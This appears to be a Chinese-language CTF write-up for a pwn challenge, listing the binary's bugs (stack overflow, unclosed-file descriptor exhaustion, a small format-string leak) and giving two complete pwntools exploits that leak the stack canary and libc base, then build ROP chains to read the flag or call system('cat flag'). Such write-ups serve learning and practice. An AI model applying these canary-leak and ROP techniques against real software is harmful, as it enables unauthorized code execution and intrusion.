題目鏈接

保護

保護還挺多

main函數(shù)

bored函數(shù)

fmt函數(shù)

secret函數(shù)

stack函數(shù)

主要漏洞點：

• stack函數(shù)有棧溢出，還有puts函數(shù)可以泄漏棧的東西
• secret函數(shù)由于每個用戶能打開的文件數(shù)是一定的，函數(shù)沒有fclose ，一直開 最后讀進(jìn)去的就是空的，所以可以繞過memcmp函數(shù)去執(zhí)行qmemcpy函數(shù)達(dá)到棧溢出

讀寫函數(shù)細(xì)節(jié)

類似的題有pwnable.kr的otp （后面做到的時候可以再回顧一下）

• fmt函數(shù)有2字節(jié)的格式化字符串漏洞
• bored函數(shù)可以控制secret棧溢出時的payload，帶有一個遞歸功能

利用方式：
1.利用bored函數(shù)遞歸幾次改變棧結(jié)構(gòu)再利用stack函數(shù)泄漏出canary，然后利用bored和secret函數(shù)來rop : open('./flag',0) --> read(0,bss,0x200) --> puts(bss)

2.利用bored函數(shù)遞歸幾次改變棧結(jié)構(gòu)再利用stack函數(shù)泄漏出canary,再用fmt函數(shù)泄漏libc得到system地址,然后利用bored和secret函數(shù)棧溢出執(zhí)行 ： system('cat flag')

exp1:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')


stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

#open('./flag',0) --> read(0,0x602068,0x200) --> puts(0x602068)
'''
open函數(shù)返回的文件描述符fd一定是未使用的最小的文件描述符。
#利用這個特性，可以改變0，1，2這三個文件描述符所指向的文件，由于進(jìn)程默認(rèn)會打開0，1，2這三個文件描述符，而且指向了鍵盤和顯示器的設(shè)備文件。
如果在open之前先進(jìn)行close(0)，然后再調(diào)用open函數(shù)就會返回最小的未使用的fd，也就是0。
如果沒有就是3
'''
open_plt = elf.plt['open']
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400c53
pop_rsi_r15 = 0x0000000000400c51

payload = './flag\0\0' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(open_plt) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x602068) + p64(0)
payload += p64(read_plt) + p64(pop_rdi) + p64(0x602068) + p64(puts_plt) 

p.sendlineafter('option:','2')
bored(payload,'y')
#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

exp2:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')

stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
offset_onegadge = 0xf1147
pop_rdi = 0x0000000000400c53


#leak libc
fsb('%a')
p.recvuntil('0x0.0')
libc_base = int(p.recvuntil('p-',drop = True),16) - 0x3c56a3
log.success('libc base addr : 0x%x' %libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x' %system_addr)
log.success('binsh addr : 0x%x' %binsh_addr)


#cat flag
payload = 'cat flag' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(system_addr)

p.sendlineafter('option:','2')
bored(payload,'y')

#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

這里用

find .|xargs grep -ri 'define O_RDONLY'  #去看了下open函數(shù)的參數(shù)flags的意思
------------------------------------------------------
/* File access modes for `open' and `fcntl'.  */
#define O_RDONLY        0       /* Open read-only.  */
#define O_WRONLY        1       /* Open write-only.  */
#define O_RDWR          2       /* Open read/write.  */